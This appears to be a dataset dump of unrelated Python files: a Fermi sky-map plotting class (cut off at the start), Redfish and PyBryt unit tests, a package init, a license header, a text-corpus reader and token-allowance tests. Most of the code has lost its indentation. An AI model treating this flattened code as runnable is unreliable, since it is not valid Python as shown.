ait = super(SourceMap, self).fill_ait( fignum=fignum, axes=axes, show_kw= self.show_kw, **kwargs)
ait.axes.set_autoscale_on(False) # prevent rescaling when adding points
self.ait=ait
return ait
def fill_zea(self, pos, fignum=21, axes=None, which=-1, savefn=None, **kwargs):
sfactor = kwargs.pop('sfactor', 1)
        zea = super(SourceMap, self).fill_zea(pos, fignum=fignum, axes=axes, show_kw= self.show_kw, **kwargs)
s = self.s
for subset, marker, color, size, label in self.subsets(s, which):
zea.plot(map(SkyDir, s.ra[subset], s.dec[subset]), edgecolor='grey',
marker=marker, c=color, s=size*sfactor, label=label)
print ('plotted %4d sources, subset "%s"' %(sum(subset), label))
plt.legend(scatterpoints=1, loc=2)
if savefn is not None:
            self.savefig(savefn)
return zea
def legend(self):
plt.legend(frameon=False,scatterpoints=1, loc=(-0.05,-0.05))
def savefig(self, fn):
plt.savefig(fn, bbox_inches='tight', pad_inches=0, dpi=160)
def subsets(self, s, which):
assoc = s.id_prob>0.8
ts25=s.ts>=25
lt25=(s.ts<25)
        t =(((~assoc)&(lt25),'+', 'grey', 8, 'no id, TS<25'),
            ((~assoc)&(ts25), 's', 'red', 10, 'no id, TS>25'),
(assoc, 'o', 'green', 12, 'associated' ),
)
return t if which <0 else (t[which],)
def add_sources(self, which=-1, sfactor=1):
s = self.s
print ('loaded %5d sources' %(len(s),))
i=0 if which<0 else which+10
plt.rcParams['legend.fontsize']= 8.0
for subset, marker, color, size, label in self.subsets(s, which):
self.ait.plot(map(SkyDir, s.ra[subset], s.dec[subset]), edgecolor='grey',
marker=marker, c=color, s=size*sfactor, label=label)
print ('plotted %4d sources, subset "%s"' %(sum(subset), label))
self.legend()
def load_skyspect(fn = r'T:\data\galprop\ring_21month_P6v11.fits',
# r'D:\fermi\data\galprop\gll_iem_v02.fit',
nside=192,
show_kw = dict(fun=np.log10, cmap='hot'),
):
"""
load a galactic diffuse distribution.
Save the HEALpix respresentation at an energy (1 GeV default)
fn : string
filename for the FITS representaion of a SKySpectrum
nside: int
HEALpix nside to use for represenation -- note that 192 is 12*16, about 0.25 deg
show_kw : dict
fun: weighting function, cmap, vmin, vmax
"""
t = SkyImage(fn)
galname = os.path.split(fn)[-1]
print ('%s: nx, ny, layers: %d %d %d' %(galname, t.naxis1(), t.naxis2(), t.layers()))
hpdir = Band(nside).dir
    dmap = list(map(lambda i:t(hpdir(i)), range(12*nside**2)))
tdm=DisplayMap(dmap)
tdm.fill_ait(fignum=12, source_kw=dict(edgecolor='w',), show_kw=show_kw )
plt.title(galname+' (1 GeV)')
sfn = galname.split('.')[0]+'.png'
plt.savefig(galname.split('.')[0]+'.png', bbox_inches='tight', pad_inches=0)
print ('saved figure to %s' % sfn)
return tdm
|
nilq/baby-python
|
python
|
# Copyright 2019 Hewlett Packard Enterprise Development LP
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import mock
from sdflexutils.redfish import main
from sdflexutils.redfish.resources.system import system
from sdflexutils.redfish.resources import update_service
from sushy import connector as sushy_connector
import testtools
class HPESushyTestCase(testtools.TestCase):
@mock.patch.object(sushy_connector, 'Connector', autospec=True)
def setUp(self, mock_connector):
super(HPESushyTestCase, self).setUp()
self.conn = mock.Mock()
mock_connector.return_value = self.conn
with open('sdflexutils/tests/unit/redfish/'
'json_samples/root.json', 'r') as f:
self.conn.get.return_value.json.return_value = (json.load(f))
self.hpe_sushy = main.HPESushy('https://1.2.3.4',
username='foo', password='bar',
verify=True)
mock_connector.assert_called_once_with(
'https://1.2.3.4', verify=True)
def test__init_throws_exception(self):
self.assertRaises(
ValueError, main.HPESushy, 'https://1.2.3.4',
'foo', 'bar', auth=mock.MagicMock())
@mock.patch.object(system, 'HPESystem', autospec=True)
def test_get_system(self, mock_system):
sys_inst = self.hpe_sushy.get_system('1234')
self.assertIsInstance(sys_inst,
system.HPESystem.__class__)
mock_system.assert_called_once_with(self.hpe_sushy._conn,
'1234',
self.hpe_sushy.redfish_version)
@mock.patch.object(update_service, 'HPEUpdateService', autospec=True)
def test_get_update_service_ah(self, mock_update_service):
self.hpe_sushy._get_action_list = mock.Mock()
self.hpe_sushy._get_action_list.return_value = [
'Oem', 'Hpe', '#SDFlexUpdateService.UpdateAll']
us_inst = self.hpe_sushy.get_update_service()
self.assertIsInstance(us_inst,
update_service.HPEUpdateService.__class__)
mock_update_service.assert_called_once_with(
self.hpe_sushy._conn, "/redfish/v1/UpdateService",
redfish_version=self.hpe_sushy.redfish_version)
@mock.patch.object(update_service, 'HPEUpdateService', autospec=True)
def test_get_update_service_ch(self, mock_update_service):
self.hpe_sushy._get_action_list = mock.Mock()
self.hpe_sushy._get_action_list.return_value = ['Oem',
'#SD.UpdateAll']
us_inst = self.hpe_sushy.get_update_service()
self.assertIsInstance(us_inst,
update_service.HPEUpdateService.__class__)
mock_update_service.assert_called_once_with(
self.hpe_sushy._conn, "/redfish/v1/UpdateService",
redfish_version=self.hpe_sushy.redfish_version)
def test__get_action_list_ah(self):
with open('sdflexutils/tests/unit/redfish/'
'json_samples/update_service_ah.json', 'r') as f:
ret_mock = mock.Mock()
ret_mock.content = (f.read()).encode('ascii')
self.hpe_sushy._conn.get.return_value = ret_mock
self.assertEqual(
self.hpe_sushy._get_action_list("/redfish/v1/UpdateService"),
['Oem', 'Hpe', '#SDFlexUpdateService.UpdateAll'])
def test__get_action_list_ch(self):
with open('sdflexutils/tests/unit/redfish/'
'json_samples/update_service_ch.json', 'r') as f:
ret_mock = mock.Mock()
ret_mock.content = (f.read()).encode('ascii')
self.hpe_sushy._conn.get.return_value = ret_mock
self.assertEqual(
self.hpe_sushy._get_action_list("/redfish/v1/UpdateService"),
['Oem', '#SD.UpdateAll'])
|
nilq/baby-python
|
python
|
"""
Tests for PyBryt annotations
"""
import time
import numpy as np
from collections.abc import Iterable
from functools import lru_cache
from pybryt import Value
from pybryt.utils import pickle_and_hash
START_TIMESTAMP = 1614904732.51892
@lru_cache(1)
def generate_memory_footprint():
"""
"""
np.random.seed(42)
return [
(np.random.uniform(-100, 100, size=(100, 100)), time.time()),
(4.0, time.time()),
(list(range(100))[::-1], time.time()),
(1, time.time()),
(np.e, time.time()),
(None, time.time()),
(None, time.time()),
(np.random.normal(size=102), time.time()),
(4.0, time.time()),
]
def test_value_annotation():
"""
"""
mfp = generate_memory_footprint()
seen = {}
for val, ts in mfp:
v = Value(val)
res = v.check(mfp)
h = pickle_and_hash(val)
# check attributes of values and results
assert len(v.children) == 0, "Value annotation has children"
assert res.satisfied is True, "Did not find value in memory footprint"
assert res._satisfied is True, "Did not find value in memory footprint"
assert res.annotation is v, "Wrong annotation in result"
assert res.children is None, "Value annotation result has children"
if h in seen:
# check that we get the earliest timestamp for duplicate values
assert np.isclose(res.timestamp, seen[h]), \
"Wrong timestamp for duplicate value in value annotation result"
else:
assert np.isclose(res.timestamp, ts), "Wrong timestamp in value annotation result"
if isinstance(val, Iterable) and hasattr(val, "all"): # for numpy arrays
assert (res.value == val).all(), "Wrong value in value annotation result"
else:
assert res.value == val, "Wrong value in value annotation result"
if h not in seen:
seen[h] = ts
v = Value(-1) # does not occur in mfp
res = v.check(mfp)
# check attributes of values and results
assert len(v.children) == 0, "Value annotation has children"
assert res.satisfied is False, "Did not find value in memory footprint"
assert res._satisfied is False, "Did not find value in memory footprint"
assert res.annotation is v, "Wrong annotation in result"
assert res.children is None, "Value annotation result has children"
assert res.timestamp == -1, "Wrong timestamp in value annotation result"
assert res.value is None, "Wrong value in value annotation result"
|
nilq/baby-python
|
python
|
""" Exteneral Device Specifications Sub-package """
#***************************************************************************************************
# Copyright 2015, 2019 National Technology & Engineering Solutions of Sandia, LLC (NTESS).
# Under the terms of Contract DE-NA0003525 with NTESS, the U.S. Government retains certain rights
# in this software.
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 or in the LICENSE file in the root pyGSTi directory.
#***************************************************************************************************
from .devcore import *
from . import ibmq_burlington
from . import ibmq_essex
from . import ibmq_london
from . import ibmq_melbourne
from . import ibmq_ourense
from . import ibmq_rueschlikon
from . import ibmq_tenerife
from . import ibmq_vigo
from . import ibmq_yorktown
from . import rigetti_agave
from . import rigetti_aspen4
from . import rigetti_aspen6
from . import rigetti_aspen7
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""The Software is provided to you by the Licensor under the License, as
defined below, subject to the following condition.
Without limiting other conditions in the License, the grant of rights under
the License will not include, and the License does not grant to you, the
right to Sell the Software.
For purposes of the foregoing, “Sell” means practicing any or all of the
rights granted to you under the License to provide to third parties, for a
fee or other consideration (including without limitation fees for hosting
or consulting/ support services related to the Software), a product or
service whose value derives, entirely or substantially, from the
functionality of the Software. Any license notice or attribution required
by the License must also include this Commons Clause License Condition
notice.
Software: WAVE Observation Framework
License: Apache 2.0 https://www.apache.org/licenses/LICENSE-2.0.txt
Licensor: Consumer Technology Association
Contributor: Eurofins Digital Product Testing UK Limited
"""
|
nilq/baby-python
|
python
|
import os
import json
pathToFolder = "c:/Users/dilGoe/Desktop/Praktikum/django"
pathToFile = "c:/Users/dilGoe/Desktop/Praktikum/django/LICENSE"


def getCorpusFolder(pathToFolder=pathToFolder):
    """Walk pathToFolder and map each file path to the list of its lines."""
    resultDictJSON = {}
    for (dirpath, dirnames, filenames) in os.walk(pathToFolder):
        for file in filenames:
            filePath = os.path.join(dirpath, file)
            with open(filePath, "rb") as f:
                lines = f.read().decode('utf-8', errors='replace').splitlines()
            resultDictJSON[filePath] = list(lines)
    return resultDictJSON


def getCorpusOneFile(filepath=pathToFile):
    """Return the non-empty lines of a single file."""
    resultList = []
    with open(filepath, "rb") as f:
        lines = f.read().decode('utf-8', errors='replace').splitlines()
    for content in lines:
        if content:
            resultList.append(content)
    return resultList
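

# The json import at the top of this script is otherwise unused; a natural use,
# shown here as a hypothetical extension (writeCorpusToJSON is not in the
# original), is serialising the corpus dict to disk:
def writeCorpusToJSON(outPath="corpus.json"):
    with open(outPath, "w", encoding="utf-8") as out:
        json.dump(getCorpusFolder(), out, ensure_ascii=False, indent=2)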


def main():
    print(getCorpusOneFile())


if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
"""Approval race condition mitigation."""
from web3.contract import Contract


def test_increase_approval(released_token: Contract, customer: str, empty_address: str, allowed_party):
"""Increase approval."""
token = released_token
amount = 5000
change = 1000
assert token.call().allowance(customer, allowed_party) == 0
token.transact({"from": customer}).approve(allowed_party, amount)
token.transact({"from": customer}).addApproval(allowed_party, change)
assert token.call().allowance(customer, allowed_party) == amount + change


def test_decrease_approval(released_token: Contract, customer: str, empty_address: str, allowed_party):
"""Decrease approval."""
token = released_token
amount = 5000
change = 1000
assert token.call().allowance(customer, allowed_party) == 0
token.transact({"from": customer}).approve(allowed_party, amount)
token.transact({"from": customer}).subApproval(allowed_party, change)
assert token.call().allowance(customer, allowed_party) == amount - change
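

# A minimal pure-Python model (illustrative only, not the contract under test)
# of the mitigation the two tests above exercise: the allowance is adjusted by
# deltas rather than overwritten, so a spender cannot front-run an approve()
# overwrite and spend both the old and the new allowance.
class AllowanceModel:
    def __init__(self):
        self.allowance = 0

    def add_approval(self, change):
        self.allowance += change

    def sub_approval(self, change):
        assert self.allowance >= change, "allowance cannot go negative"
        self.allowance -= change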
|
nilq/baby-python
|
python
|